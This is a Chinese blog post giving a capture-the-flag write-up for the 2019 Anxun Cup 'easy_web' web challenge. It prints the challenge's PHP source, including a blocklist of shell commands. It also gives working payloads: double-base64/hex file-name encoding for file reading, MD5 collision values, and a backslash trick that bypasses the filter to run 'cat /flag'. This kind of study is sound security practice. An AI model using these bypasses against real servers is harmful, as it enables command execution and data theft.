[安洵杯 2019]easy_web

最新推荐文章于 2024-02-02 23:35:54 发布

切谁怕谁

最新推荐文章于 2024-02-02 23:35:54 发布

阅读量489

点赞数

分类专栏： buu

本文链接：https://blog.csdn.net/missht0/article/details/113122161

版权

buu 专栏收录该内容

32 篇文章 0 订阅

订阅专栏

[安洵杯 2019]easy_web

在这里插入图片描述
url里面有一串很像base64编码的字符串，解码

再解

所以我们可以猜测，url里存在文件包含漏洞，文件名可以通过hex加密一次，base64加密两次传入

试着把index.php传入

index.php
hex:	696E6465782E706870
base64:	Njk2RTY0NjU3ODJFNzA2ODcw
base64:	TmprMlJUWTBOalUzT0RKRk56QTJPRGN3

将url里面img的参数改成TmprMlJUWTBOalUzT0RKRk56QTJPRGN3
（不过这里我发现在初始页面改它没有回显，我是在源码页面才改成的）
在这里插入图片描述
解码

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);//
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi～ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) //这里正则了很多东西啊，但是据传言，|\\\|才能正则\，也就是说这里的\是没有被正则的。
{
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {//md5强碰撞绕过
        echo `$cmd`;//echo ``也是常见的命令执行了
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>

在bp里面，用hackbar会二次编码

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
get：$cmd=ca\t%20/flag

还有一种方法是用?cmd=dir来查根目录
用sort /flag来查文件

切谁怕谁

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[安洵杯 2019]easy_web

[安洵杯 2019]easy_weburl里面有一串很像base64编码的字符串，解码再解所以我们可以猜测，url里存在文件包含漏洞，文件名可以通过hex加密一次，base64加密两次传入试着把index.php传入index.phphex: 696E6465782E706870base64: Njk2RTY0NjU3ODJFNzA2ODcwbase64: TmprMlJUWTBOalUzT0RKRk56QTJPRGN3将url里面img的参数改成TmprMlJUWTBOalUz
复制链接

扫一扫